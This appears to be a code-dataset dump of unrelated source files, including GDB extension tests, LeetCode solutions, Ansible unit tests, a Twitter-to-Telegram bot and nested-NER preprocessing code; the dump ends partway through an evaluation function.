        # With an argument, $_base() resolves a named mapping (libc here),
        # whose base must differ from the main binary's base.
        cmd = "x/s $_base(\"libc\")"
        res = gdb_start_silent_cmd(cmd)
        self.assertNoException(res)
        self.assertIn("\\177ELF", res)
        addr2 = res.splitlines()[-1].split()[0][:-1]
        self.assertNotEqual(addr, addr2)

    def test_func_bss(self):
        """`$_bss()` GDB function test"""
        cmd = "deref $_bss()"
        # The "bss" target stores a known string in its .bss section.
        target = _target("bss")
        self.assertFailIfInactiveSession(gdb_run_cmd(cmd, target=target))
        res = gdb_run_silent_cmd(cmd, target=target)
        self.assertNoException(res)
        self.assertIn("Hello world!", res)

    def test_func_got(self):
        """`$_got()` GDB function test"""
        cmd = "deref $_got()"
        # The "heap" target imports malloc, which must show up in its GOT.
        target = _target("heap")
        self.assertFailIfInactiveSession(gdb_run_cmd(cmd, target=target))
        res = gdb_run_silent_cmd(cmd, target=target)
        self.assertNoException(res)
        self.assertIn("malloc", res)

    def test_func_heap(self):
        """`$_heap()` GDB function test"""
        cmd = "deref $_heap()"
        target = _target("heap")
        self.assertFailIfInactiveSession(gdb_run_cmd(cmd, target=target))
        res = gdb_run_silent_cmd(cmd, target=target)
        self.assertNoException(res)
        # Expected offsets differ by pointer width (8 vs 4 bytes per slot).
        if is_64b():
            self.assertIn("+0x0048:", res)
        else:
            self.assertIn("+0x0024:", res)

        # $_heap() also accepts an arithmetic offset expression.
        cmd = "deref $_heap(0x10+0x10)"
        res = gdb_run_silent_cmd(cmd, target=target)
        self.assertNoException(res)
        if is_64b():
            self.assertIn("+0x0048:", res)
        else:
            self.assertIn("+0x0024:", res)

    def test_func_stack(self):
        """`$_stack()` GDB function test"""
        cmd = "deref $_stack()"
        self.assertFailIfInactiveSession(gdb_run_cmd(cmd))
        res = gdb_start_silent_cmd(cmd)
        self.assertNoException(res)
        # A fresh stack slot should dereference to zero at the expected offset.
        if is_64b():
            self.assertRegex(res, r"\+0x0*20: *0x0000000000000000\n")
        else:
            self.assertRegex(res, r"\+0x0.*20: *0x00000000\n")
|
990,937 | 41a293b0ac82acdb418f94fc1720ea5150f0e734 | # import...as for abbreviations
import statistics as stat
# Sample exam grades whose arithmetic mean we report.
grades = [89, 56, 78, 34, 23]
mean_grade = stat.mean(grades)
print(mean_grade)
|
990,938 | ac3a1fd0bf2e0e3e33a6458f91f8c3ca19230608 | Leninsky_photo = [
"encyclopedia_leninsky_guestion_1", "encyclopedia_leninsky_guestion_2","encyclopedia_leninsky_guestion_3", "encyclopedia_leninsky_guestion_4", "encyclopedia_leninsky_guestion_5","encyclopedia_leninsky_guestion_6",
"encyclopedia_leninsky_guestion_7","encyclopedia_leninsky_guestion_8","encyclopedia_leninsky_guestion_9", "encyclopedia_leninsky_guestion_10","encyclopedia_leninsky_guestion_11","encyclopedia_leninsky_guestion_12",
"encyclopedia_leninsky_guestion_13","encyclopedia_leninsky_guestion_14","encyclopedia_leninsky_guestion_15","encyclopedia_leninsky_guestion_16","encyclopedia_leninsky_guestion_17","encyclopedia_leninsky_guestion_18",
"encyclopedia_leninsky_guestion_19","encyclopedia_leninsky_guestion_20","encyclopedia_leninsky_guestion_21","encyclopedia_leninsky_guestion_22","encyclopedia_leninsky_guestion_23","encyclopedia_leninsky_guestion_24",
"encyclopedia_leninsky_guestion_25","encyclopedia_leninsky_guestion_26","encyclopedia_leninsky_guestion_27","encyclopedia_leninsky_guestion_28",
]
max_len=len(Leninsky_photo)
|
990,939 | 32911332687880c552f5d8b75ad3f83247c522a2 | def Evaluation(Word1,Word2):
if len(Word1)<len(Word2):
mini=len(Word1)
maxi=len(Word2)
else:
mini=len(Word2)
maxi=len(Word1)
SameValue=0 # counter to poso idia eiani ta 2 string
for i in range(0,mini):
if Word1[i]==Word2[i]:
SameValue=SameValue+1
SameValue=float(SameValue)
EvalPersent=(SameValue/maxi)*100
return EvalPersent
# Example run: ~44.4% similarity between 'miltos' and 'miltiadis'.
# (Python 2 print statement — this script predates Python 3.)
Eval=Evaluation('miltos','miltiadis')
print Eval
|
990,940 | 404b7c5e8a6710b38d8ff140fa3524cf1d56556b | # Write a function to find the longest common prefix
# string amongst an array of strings.
class Solution(object):
    def longestCommonPrefix(self, strs):
        """
        Return the longest common prefix of all strings in *strs*
        ("" when the list is empty or there is no common prefix).

        :type strs: List[str]
        :rtype: str

        Improvements over the original: drops the Python-2-only ``xrange``
        and the O(n*m^2) repeated substring scans in favour of the standard
        shrink-the-prefix approach (O(n*m) worst case), and removes the
        redundant shortest-string bookkeeping.
        """
        if not strs:
            return ""
        # The answer can be no longer than the shortest string.
        prefix = min(strs, key=len)
        for s in strs:
            # Trim the candidate until it prefixes the current string.
            while prefix and not s.startswith(prefix):
                prefix = prefix[:-1]
        return prefix
990,941 | 71d61cb7829129202c70e327fe314ac7bd95206b | # coding=utf-8
import logging
import time
import urllib
logger = logging.getLogger(__name__)
def getIp():
    """Fetch one proxy IP from the goubanjia API, waiting 6s and retrying on failure.

    Returns the raw response line from the API (the proxy address).
    """
    order = "8eb1b6753a6652c56f1a05f132cb304f"
    apiUrl = "http://dynamic.goubanjia.com/dynamic/get/" + order + ".html"
    # Loop instead of recursing: the original called itself on every failure,
    # which can blow the recursion limit during a long outage.
    while True:
        try:
            ress = urllib.urlopen(apiUrl).read().strip("\n")
            print("---???---" + ress)
            # BUG FIX: the original tested `"too many requests".startswith(ress)`,
            # which is backwards — it only matched when the whole response was a
            # prefix of the literal.  We want to detect a rate-limit response
            # that BEGINS with that phrase.
            if ress.startswith("too many requests"):
                logger.info("-------------too many requests---------------------")
                time.sleep(6)
                continue
            logger.info("-------------ip 代理获取-------------------")
            return ress
        except Exception as e:
            print(e)
            logger.info("-----------------:ip获取异常 睡眠五秒:-----------------")
            time.sleep(6)
            logger.info("-----------------:ip获取异常:-----------------")
# def getHtmlIp():
# targetUrl = "http://1212.ip138.com/ic.asp"
# ip=getIp()
# logger.info(ip)
# proxy_handler = urllib2.ProxyHandler({
# 'http': 'http://' + ip
# })
# opener = urllib2.build_opener(proxy_handler)
# html = opener.open(targetUrl)
# print(html.read().decode("utf-8"))
|
990,942 | 985d1a1ef067574c9f76cbc3806bf98a36dad6e1 | #!/usr/bin/python env
# coding: utf-8
from ConfigParser import ConfigParser
import os
# Paths are resolved relative to the current working directory.
root = os.path.abspath(".")
config_path = os.path.join(root, "config")

# Load configuration from config/db.conf.
config = ConfigParser()
config.read(os.path.join(config_path, "db.conf"))

# Database to migrate ([migrate_db] section); the port must be an int
# because ConfigParser returns every value as a string.
migrate_db_dict = dict(config.items("migrate_db"))
migrate_db_dict["port"] = int(migrate_db_dict["port"])

# Ads offline database ([db] section).
ads_offline_db_dict = dict(config.items("db"))
ads_offline_db_dict["port"] = int(ads_offline_db_dict["port"])

# Source database for syncing CpcFinanceDetail ([dev_db] section).
finance_dict = dict(config.items("dev_db"))
finance_dict["port"] = int(finance_dict["port"])
|
990,943 | 549e7c8eae2ce26027a2732e141947cca244486e | /home/jibin/anaconda3/lib/python3.6/codecs.py |
990,944 | dbcfa52a22163cc418b38d16c0e2a863604cb7f3 | from math import floor
# Read the current world record, the distance, and the pace per meter.
record = float(input())
meters = float(input())
seconds_per_meter = float(input())

swim_time = meters * seconds_per_meter
# Every full 15 meters adds 12.5 seconds of water-resistance delay.
# resistance_seconds = int(meters / 15 * 12.5)
delay = floor(meters / 15) * 12.5
total_time = swim_time + delay

if total_time < record:
    print(f"Yes, he succeeded! The new world record is {total_time:.2f} seconds.")
else:
    print(f"No, he failed! He was {total_time - record:.2f} seconds slower.")
|
990,945 | 3177c8450ef94d1b9279d77d82995d57001253b4 | from typing import List
class Solution:
    def find132pattern(self, nums: List[int]) -> bool:
        """Brute force: test every (i, j, k) triple — O(n^3), kept for reference only."""
        size = len(nums)
        for i in range(size - 2):
            for j in range(i + 1, size - 1):
                for k in range(j + 1, size):
                    if nums[i] < nums[k] < nums[j]:
                        return True
        return False
class Solution1:
    def find132pattern(self, nums: List[int]) -> bool:
        """O(n^2): track the running minimum left of j, scan every k right of j.

        Time O(N^2), space O(1).  Assumes *nums* is non-empty (as the
        original did — it read nums[0] unconditionally).
        See https://leetcode-cn.com/problems/132-pattern/solution/fu-xue-ming-zhu-cong-bao-li-qiu-jie-dao-eg78f/
        """
        left_minimum = nums[0]
        size = len(nums)
        for j in range(1, size):
            for k in range(j + 1, size):
                # left_minimum plays the "1", nums[j] the "3", nums[k] the "2".
                if nums[j] > nums[k] > left_minimum:
                    return True
            left_minimum = min(left_minimum, nums[j])
        return False
class Solution2:
    def find132pattern(self, nums: List[int]) -> bool:
        """Monotonic-stack solution, O(n) time, O(n) space.

        Scan from the right, keeping a decreasing stack of candidate "3"
        values.  ``max_k`` is the largest value ever popped: it is a valid
        "2" because the element that popped it (to its left) is larger.  Any
        nums[i] strictly below ``max_k`` therefore completes a 132 pattern.
        See https://leetcode-cn.com/problems/132-pattern/solution/xiang-xin-ke-xue-xi-lie-xiang-jie-wei-he-95gt/

        Fixes over the original: ``deque`` is now actually imported (the
        original raised NameError at runtime — the file only imported List),
        and the two alternative implementations that sat unreachable after
        the first ``return False`` were removed.
        """
        from collections import deque

        stack = deque()
        # Sentinel below any allowed value; acts as -infinity for "2".
        max_k = -10 ** 9 - 1
        for i in range(len(nums) - 1, -1, -1):
            if nums[i] < max_k:
                return True
            # Values smaller than nums[i] become "2" candidates; keep the best.
            while stack and stack[-1] < nums[i]:
                max_k = max(stack.pop(), max_k)
            stack.append(nums[i])
        return False
class Solution3:
    def find132pattern(self, nums: List[int]) -> bool:
        """Prefix-minimum + monotonic stack, scanning j from right to left.

        mi[j] is the minimum of nums[0..j] (the best available "1" for
        position j).  The stack keeps candidate "2" values seen to the right;
        any stack top strictly between mi[j] and nums[j] completes a 132
        pattern with nums[j] as the "3".
        See https://leetcode-cn.com/problems/132-pattern/solution/132mo-shi-by-leetcode-2/

        Fixes over the original: removed the stray debug ``print(mi)`` that
        polluted stdout on every call, and replaced the long pasted-in C++
        next-greater-element template in the docstring.  Assumes *nums* is
        non-empty (as the original did — it read nums[0] unconditionally).
        """
        # Running prefix minima: mi[j] == min(nums[:j + 1]).
        mi = [nums[0]]
        for num in nums[1:]:
            mi.append(min(mi[-1], num))
        stack = []
        for j in range(len(nums) - 1, -1, -1):
            if nums[j] > mi[j]:
                # Drop stack values too small to serve as the middle "2".
                while stack and stack[-1] <= mi[j]:
                    stack.pop()
                if stack and stack[-1] < nums[j]:
                    return True
                stack.append(nums[j])
        return False
|
990,946 | d878afd96c0f4cac9e4d6b93bc7b84cbb7d2e4ce | #
# (c) 2018 Extreme Networks Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from mock import MagicMock, patch, call
from ansible_collections.community.network.tests.unit.compat import unittest
from ansible_collections.community.network.plugins.module_utils.network.slxos import slxos
class TestPluginCLIConfSLXOS(unittest.TestCase):
    """ Test class for SLX-OS CLI Conf Methods

    Exercises the slxos module-utils helpers: connection caching,
    capability retrieval, command execution and config loading.
    """

    def test_get_connection_established(self):
        """ Test get_connection with established connection

        A module that already carries slxos_connection must get it back
        unchanged (no new Connection is created).
        """
        module = MagicMock()
        connection = slxos.get_connection(module)
        self.assertEqual(connection, module.slxos_connection)

    @patch('ansible_collections.community.network.plugins.module_utils.network.slxos.slxos.Connection')
    def test_get_connection_new(self, connection):
        """ Test get_connection with new connection

        With no cached connection, get_connection must build one from the
        module's socket path and cache it as module.slxos_connection.
        """
        socket_path = "little red riding hood"
        # spec=['fail_json'] ensures no pre-existing slxos_connection attribute.
        module = MagicMock(spec=[
            'fail_json',
        ])
        module._socket_path = socket_path

        connection().get_capabilities.return_value = '{"network_api": "cliconf"}'
        returned_connection = slxos.get_connection(module)
        connection.assert_called_with(socket_path)
        self.assertEqual(returned_connection, module.slxos_connection)

    @patch('ansible_collections.community.network.plugins.module_utils.network.slxos.slxos.Connection')
    def test_get_connection_incorrect_network_api(self, connection):
        """ Test get_connection with incorrect network_api response

        A non-cliconf transport must trigger module.fail_json (surfaced here
        as TypeError via the side_effect).
        """
        socket_path = "little red riding hood"
        module = MagicMock(spec=[
            'fail_json',
        ])
        module._socket_path = socket_path
        module.fail_json.side_effect = TypeError

        connection().get_capabilities.return_value = '{"network_api": "nope"}'

        with self.assertRaises(TypeError):
            slxos.get_connection(module)

    @patch('ansible_collections.community.network.plugins.module_utils.network.slxos.slxos.Connection')
    def test_get_capabilities(self, connection):
        """ Test get_capabilities

        The JSON capabilities string from the connection must come back as a
        parsed dict.
        """
        socket_path = "little red riding hood"
        module = MagicMock(spec=[
            'fail_json',
        ])
        module._socket_path = socket_path
        module.fail_json.side_effect = TypeError

        capabilities = {'network_api': 'cliconf'}

        connection().get_capabilities.return_value = json.dumps(capabilities)

        capabilities_returned = slxos.get_capabilities(module)

        self.assertEqual(capabilities, capabilities_returned)

    @patch('ansible_collections.community.network.plugins.module_utils.network.slxos.slxos.Connection')
    def test_run_commands(self, connection):
        """ Test get_capabilities

        run_commands must forward each command to connection.get (with
        prompt/answer defaulting to None) and return the responses in order.
        """
        module = MagicMock()

        commands = [
            'hello',
            'dolly',
            'well hello',
            'dolly',
            'its so nice to have you back',
            'where you belong',
        ]

        responses = [
            'Dolly, never go away again1',
            'Dolly, never go away again2',
            'Dolly, never go away again3',
            'Dolly, never go away again4',
            'Dolly, never go away again5',
            'Dolly, never go away again6',
        ]

        module.slxos_connection.get.side_effect = responses

        run_command_responses = slxos.run_commands(module, commands)

        calls = []

        for command in commands:
            calls.append(call(
                command,
                None,
                None
            ))

        module.slxos_connection.get.assert_has_calls(calls)
        self.assertEqual(responses, run_command_responses)

    @patch('ansible_collections.community.network.plugins.module_utils.network.slxos.slxos.Connection')
    def test_load_config(self, connection):
        """ Test load_config

        load_config must hand the whole command list to edit_config exactly
        once.
        """
        module = MagicMock()

        commands = [
            'what does it take',
            'to be',
            'number one?',
            'two is not a winner',
            'and three nobody remember',
        ]

        slxos.load_config(module, commands)

        module.slxos_connection.edit_config.assert_called_once_with(commands)
|
990,947 | bd7be83833c964277600814f4d597d03115a833f | from pathlib import Path
# Path object pointing at this source file itself.
# NOTE(review): if the containing directory was intended (common for a data
# root), the usual idiom is Path(__file__).parent — confirm with callers.
src_data_path = Path(__file__)
|
990,948 | 1a37e083e00e475ee2f9d03b80b671667a27ba0d | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-23 08:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 1.11.3; applied migrations must not be
    # hand-edited — create a new migration for further schema changes.

    dependencies = [
        ('deals', '0002_auto_20171021_1137'),
    ]

    operations = [
        # Adds the optional external purchase link to the Deal model.
        migrations.AddField(
            model_name='deal',
            name='buy_url',
            field=models.URLField(blank=True, null=True),
        ),
    ]
|
990,949 | 992b0f733c317b6154b62b115cd874b1d234dda5 |
import numpy as np
from scipy import stats
x = np.array([ 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 2., 1., 1., 2., 1., 1.,
2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 3., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1.])
y = np.array([ 1., 1., 1., 1., 1., 1., 1., 2., 1., 2., 1., 1., 1.,
1., 2., 1., 1., 1., 2., 1., 1., 1., 1., 1., 2., 1., 1., 3., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 2., 1., 2., 1., 1., 1., 1.,
1., 1., 2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 2., 1., 1., 1., 1., 1., 2., 2., 1., 1., 2., 1., 1., 2.,
1., 2., 1., 1., 1., 1., 2., 2., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 2., 2., 2., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 2., 1., 1., 2., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 2., 1., 1., 1., 1., 1.,
1.])
# Python 2 script: compares rank-based tests on the x/y samples above.
print stats.ranksums(x,y)
print stats.mstats.mannwhitneyu(x,y)
# NOTE(review): stats.stats is a legacy alias of scipy.stats; removed in
# modern SciPy — this script targets an old SciPy release.
print stats.stats.mannwhitneyu(x,y)
print 'correct is (16980.5, 5.6428655312664676e-005)'
from numpy.testing import assert_array_almost_equal
# The asserted p-value is half the "correct" one quoted above — presumably
# one-sided vs two-sided reporting of the old mannwhitneyu; confirm against
# the SciPy version in use.
assert_array_almost_equal(stats.stats.mannwhitneyu(x,y),
                          (16980.5, 2.8214327656317373e-005))
print stats.stats.mannwhitneyu(x, y, use_continuity=False)
print stats.kruskal(x,y)
|
990,950 | 85df36f1a412a40bc8b39b8be55646de8d2c8b16 | #Import the necessary methods from tweepy library
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
import json
import requests
#Variables that contains the user credentials to access Twitter API
access_token = ""
access_token_secret = ""
consumer_key = ""
consumer_secret = ""
#This is a basic listener that just prints received tweets to stdout.
class StdOutListener(StreamListener):
    """Tweepy stream listener that dumps each tweet to stdout and, when the
    tweet matches the hard-coded keywords and carries a photo, forwards the
    tweet URL and image to a Telegram chat via the Bot API."""

    def on_data(self, data):
        """Handle one raw stream payload.

        Always returns True so the stream stays open, even when the tweet
        has no media or the Telegram calls fail (best-effort forwarding).
        """
        decoded = json.loads(data)
        print(json.dumps(decoded, sort_keys=True))
        print(decoded['text'].encode('utf-8', 'ignore'),
              decoded['text'],
              type(decoded['text'])
              )
        chat_id = ''  # telegram chat id
        apiurl = ''   # telegram bot api
        try:  # if photo exists, then do the work
            print(decoded["entities"]["media"][0]["media_url_https"])
            telemethod = "sendPhoto"
            urlphoto = '%s%s?chat_id=%s&photo=%s' % (apiurl, telemethod, chat_id, decoded["entities"]["media"][0]["media_url_https"])  # image url
            telemethod = "sendMessage"
            urlm = '%s%s?chat_id=%s&text=%s' % (apiurl, telemethod, chat_id, decoded["entities"]["media"][0]["url"])  # message url
            # Detect whether the tweet text contains the target keywords
            # (and is not a retweet).
            if ("月曜日のたわわ" in decoded['text'] and "その" in decoded['text'] and "RT" not in decoded['text']):
                print("Exist!!!")
                r = requests.get(urlm + ' this week\'s tawawa')  # send url & bot's msg
                print(r.status_code)
                r = requests.get(urlphoto)  # send image
                print(r.status_code)
        # BUG FIX: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt, making the stream impossible to stop cleanly.
        # Keep the broad best-effort behavior for ordinary errors (missing
        # media keys, Telegram/network failures) but let BaseExceptions out.
        except Exception:
            print("No Photo RRRRRRRR")
        return True

    def on_error(self, status):
        # Stream-level error callback: just report the status code.
        print(status)
if __name__ == '__main__':
    # This handles Twitter authentication and the connection to the
    # Twitter Streaming API.
    l = StdOutListener()
    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    stream = Stream(auth, l)
    # Filter the stream by the listed Twitter user ids (empty here —
    # fill in the ids of the accounts to follow).
    #users = []
    stream.filter(follow=[])  # filter source with twitter user id
990,951 | 03468eb136177ef0c398e46aef70d153904bfc61 | import torch
from tqdm import tqdm
class InputExample(object):
    """A single training/test example for simple sequence classification."""
    def __init__(self, guid, text_a, pos, label=None):
        """Constructs a InputExample.

        Args:
            guid: Unique id for the example.
            text_a: string. The untokenized text of the first sequence. For single
                sequence tasks, only this sequence must be specified.
            pos: part-of-speech / position information for the example;
                stored as given (callers in this file pass None).
            label: (Optional) string. The label of the example. This should be
                specified for train and dev examples, but not for test examples.
        """
        self.guid = guid
        self.text_a = text_a
        self.pos = pos
        self.label = label
class InputFeatures(object):
    """Bundle of padded model inputs for a single example.

    Attributes mirror the constructor arguments one-to-one; all sequences
    are expected to already be padded to the maximum sequence length.
    """
    def __init__(self, input_ids, input_mask, segment_ids, gather_ids, gather_masks, partial_masks):
        # Sub-token ids, attention mask and segment ids.
        self.input_ids = input_ids
        self.input_mask = input_mask
        self.segment_ids = segment_ids
        # Word-initial sub-token positions and their validity mask.
        self.gather_ids = gather_ids
        self.gather_masks = gather_masks
        # Span-level supervision mask (marginalize / evaluate / reject).
        self.partial_masks = partial_masks
class DataProcessor(object):
    """Abstract base class for corpus readers used by the feature pipeline."""

    def __init__(self, logger):
        self.logger = logger

    def get_train_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the train set."""
        raise NotImplementedError()

    def get_dev_examples(self, data_dir):
        """Gets a collection of `InputExample`s for the dev set."""
        raise NotImplementedError()

    def get_labels(self):
        """Gets the list of labels for this data set."""
        raise NotImplementedError()

    @classmethod
    def _read(cls, input_file, quotechar=None):
        """Read a text file and return its lines with surrounding whitespace
        (including the trailing newline) stripped."""
        with open(input_file, "r", encoding='utf-8') as handle:
            return [raw_line.strip() for raw_line in handle]
class Processor(DataProcessor):
    """Processor NQG data set.

    Reads nested-NER corpora (ACE04 / ACE05 / GENIA) and converts them into
    `InputFeatures`, including the span-level partial masks used for
    partially observed training.
    """
    def __init__(self, logger, dataset, latent_size):
        self.logger = logger
        # The label inventory depends on the corpus.
        if dataset == "ACE04" or dataset == "ACE05":
            self.labels = ['PER', 'LOC', 'ORG', 'GPE', 'FAC', 'VEH', 'WEA']
        elif dataset == "GENIA":
            self.labels = ['None', 'G#RNA', 'G#protein', 'G#DNA', 'G#cell_type', 'G#cell_line']
        else:
            raise NotImplementedError()
        # Each example occupies `interval` consecutive lines in the data file.
        if dataset == "ACE05" or dataset == "GENIA" or dataset == "ACE04":
            self.interval = 4
        else:
            raise NotImplementedError()
        # Number of extra latent (unobserved) tags appended after the real ones.
        self.latent_size = latent_size
    def get_train_examples(self, input_file):
        """See base class."""
        self.logger.info("LOOKING AT {}".format(input_file))
        return self._create_examples(
            self._read(input_file), "train")
    def get_dev_examples(self, input_file):
        """See base class."""
        self.logger.info("LOOKING AT {}".format(input_file))
        return self._create_examples(
            self._read(input_file), "dev")
    def get_labels(self):
        """See base class."""
        return self.labels
    def _create_examples(self, lines, type):
        """Creates examples for the training and dev sets."""
        examples = []
        # Line i holds the sentence text, line i+2 its span annotations;
        # the remaining lines of each `interval`-sized record are unused here.
        for i in range(0, len(lines), self.interval):
            text_a = lines[i]
            label = lines[i + 2]
            examples.append(
                InputExample(guid=len(examples), text_a=text_a, pos=None, label=label))
        return examples
    def convert_examples_to_features(self, examples, max_seq_length, tokenizer):
        """Loads a data file into a list of `InputBatch`s."""
        features = []
        for (ex_index, example) in enumerate(tqdm(examples)):
            tokens = tokenizer.tokenize(example.text_a)
            gather_ids = list()
            # Record the position (+1 for the [CLS] offset) of every
            # word-initial sub-token so word-level outputs can be gathered.
            for (idx, token) in enumerate(tokens):
                if (not token.startswith("##") and idx < max_seq_length - 2):
                    gather_ids.append(idx + 1)
            # Account for [CLS] and [SEP] with "- 2"
            if len(tokens) > max_seq_length - 2:
                tokens = tokens[:max_seq_length - 2]
            tokens = ["[CLS]"] + tokens + ["[SEP]"]
            segment_ids = [0] * len(tokens)
            input_ids = tokenizer.convert_tokens_to_ids(tokens)
            # The mask has 1 for real tokens and 0 for padding tokens. Only real
            # tokens are attended to.
            input_mask = [1] * len(input_ids)
            # Zero-pad up to the sequence length.
            padding = [0] * (max_seq_length - len(input_ids))
            input_ids += padding
            input_mask += padding
            segment_ids += padding
            gather_padding = [0] * (max_seq_length - len(gather_ids))
            gather_masks = [1] * len(gather_ids) + gather_padding
            gather_ids += gather_padding
            assert len(input_ids) == max_seq_length
            assert len(input_mask) == max_seq_length
            assert len(segment_ids) == max_seq_length
            assert len(gather_ids) == max_seq_length
            assert len(gather_masks) == max_seq_length
            # NOTE: the span mask is built over whitespace-split words, not
            # over the sub-tokens produced above.
            partial_masks = self.generate_partial_masks(example.text_a.split(' '), max_seq_length, example.label,
                                                        self.labels)
            # Log the first couple of examples for manual inspection.
            if ex_index < 2:
                self.logger.info("*** Example ***")
                self.logger.info("guid: %s" % (example.guid))
                self.logger.info("tokens: %s" % " ".join(
                    [str(x) for x in tokens]))
                self.logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
                self.logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
                self.logger.info(
                    "segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
                self.logger.info(
                    "gather_ids: %s" % " ".join([str(x) for x in gather_ids]))
                self.logger.info(
                    "gather_masks: %s" % " ".join([str(x) for x in gather_masks]))
                # self.logger.info("label: %s (id = %s)" % (example.label, " ".join([str(x) for x in label_ids])))
            features.append(
                InputFeatures(input_ids=input_ids,
                              input_mask=input_mask,
                              segment_ids=segment_ids,
                              partial_masks=partial_masks,
                              gather_ids=gather_ids,
                              gather_masks=gather_masks))
        return features
    def _truncate_seq_pair(self, tokens_a, tokens_b, max_length):
        """Truncates a sequence pair in place to the maximum length."""
        # This is a simple heuristic which will always truncate the longer sequence
        # one token at a time. This makes more sense than truncating an equal percent
        # of tokens from each, since if one sequence is very short then each token
        # that's truncated likely contains more information than a longer sequence.
        while True:
            total_length = len(tokens_a) + len(tokens_b)
            if total_length <= max_length:
                break
            if len(tokens_a) > len(tokens_b):
                tokens_a.pop()
            else:
                tokens_b.pop()
    def generate_partial_masks(self, tokens, max_seq_length, labels, tags):
        """Build the (max_seq_length x max_seq_length x tags) span mask.

        `labels` is a '|'-separated list of "start,end TAG" annotations
        (end exclusive). Cell states while building:
        2 = undecided, 1 = evaluation (observed), 0 = rejection.
        """
        total_tags_num = len(tags) + self.latent_size
        labels = labels.split('|')
        label_list = list()
        for label in labels:
            if not label:
                continue
            sp = label.strip().split(' ')
            start, end = sp[0].split(',')[:2]
            start = int(start)
            # Annotation end is exclusive; store it inclusive.
            end = int(end) - 1
            label_list.append((start, end, sp[1]))
        mask = [[[2 for x in range(total_tags_num)] for y in range(max_seq_length)] for z in range(max_seq_length)]
        l = min(len(tokens), max_seq_length)
        # 2 marginalization
        # 1 evaluation
        # 0 rejection
        for start, end, tag in label_list:
            if start < max_seq_length and end < max_seq_length:
                tag_idx = tags.index(tag)
                # Observed span: only its own tag is evaluated; every other
                # tag at that cell is rejected.
                mask[start][end][tag_idx] = 1
                for k in range(total_tags_num):
                    if k != tag_idx:
                        mask[start][end][k] = 0
                # Reject every span that crosses (partially overlaps) the
                # observed span — nested-NER spans may nest but not cross.
                for i in range(l):
                    if i > end:
                        continue
                    for j in range(i, l):
                        if j < start:
                            continue
                        if (i > start and i <= end and j > end) or (i < start and j >= start and j < end):
                            for k in range(total_tags_num):
                                mask[i][j][k] = 0
        # Reject all ill-formed spans with j < i.
        for i in range(l):
            for j in range(0, i):
                for k in range(total_tags_num):
                    mask[i][j][k] = 0
        # Undecided cells inside the sentence: reject real tags, marginalize
        # over the latent tags.
        for i in range(l):
            for j in range(i, l):
                for k in range(total_tags_num):
                    if mask[i][j][k] == 2:
                        if k < len(tags):
                            mask[i][j][k] = 0
                        else:
                            mask[i][j][k] = 1
        # Everything beyond the sentence (padding region) is rejected.
        for i in range(max_seq_length):
            for j in range(max_seq_length):
                for k in range(total_tags_num):
                    if mask[i][j][k] == 2:
                        mask[i][j][k] = 0
        return mask
class MultitasksResultItem():
    """Per-span prediction record emitted by the multitask heads."""
    def __init__(self, id, start_prob, end_prob, span_prob, label_id, position_id, start_id, end_id):
        # Identifier of the example this result belongs to.
        self.id = id
        # Probabilities for the span boundaries and the span itself.
        self.start_prob = start_prob
        self.end_prob = end_prob
        self.span_prob = span_prob
        # Predicted label and location information.
        self.label_id = label_id
        self.position_id = position_id
        self.start_id = start_id
        self.end_id = end_id
def eval(args, outputs, partial_masks, label_size, gather_masks):
    """Count matching spans between decoded outputs and gold partial masks.

    Returns (correct, predicted, gold) span counts summed over the batch.
    `args` is accepted for interface compatibility but is not used.
    """
    n_correct = 0
    n_pred = 0
    n_gold = 0
    seq_lens = gather_masks.sum(1).cpu().numpy()
